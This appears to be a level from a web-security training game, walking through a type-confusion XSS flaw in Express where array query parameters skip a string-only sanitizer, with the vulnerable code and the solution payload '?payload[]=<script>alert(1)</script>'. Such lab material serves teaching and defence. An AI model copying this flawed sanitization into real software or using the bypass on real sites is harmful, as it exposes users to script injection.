Level 12: Express Type Confusion

MISSION: The server-side WAF perfectly sanitizes strings. Find a way to alter your GET request parameters so the backend sees an Array instead of a String, bypassing the WAF entirely.

Test_String
/// SOURCE CODE INSPECTOR ///

// Backend Express Logic
let payload = req.query.payload;

// FLAW: The developer assumes 'payload' is always a String.
// If the attacker sends an Array (e.g., ?payload[]=1&payload[]=2),
// the typeof check fails, the filter is skipped, but Express still 
// concatenates the array into the HTML response!

if (typeof payload === 'string') {
    // Strict filter for strings
    payload = payload.replace(/</g, '&lt;').replace(/>/g, '&gt;');
}

res.send("<div id='log'>" + payload + "</div>");

/// DECRYPTION COMPLETE ///

By default, Express.js parses duplicate URL parameters into an Array. The backend checks typeof payload === 'string' to apply the sanitization. By sending an array, we bypass the if block. Express then concatenates the array into the response string, executing the payload.

Payload (Manually edit the URL):

?payload[]=<script>alert(1)</script>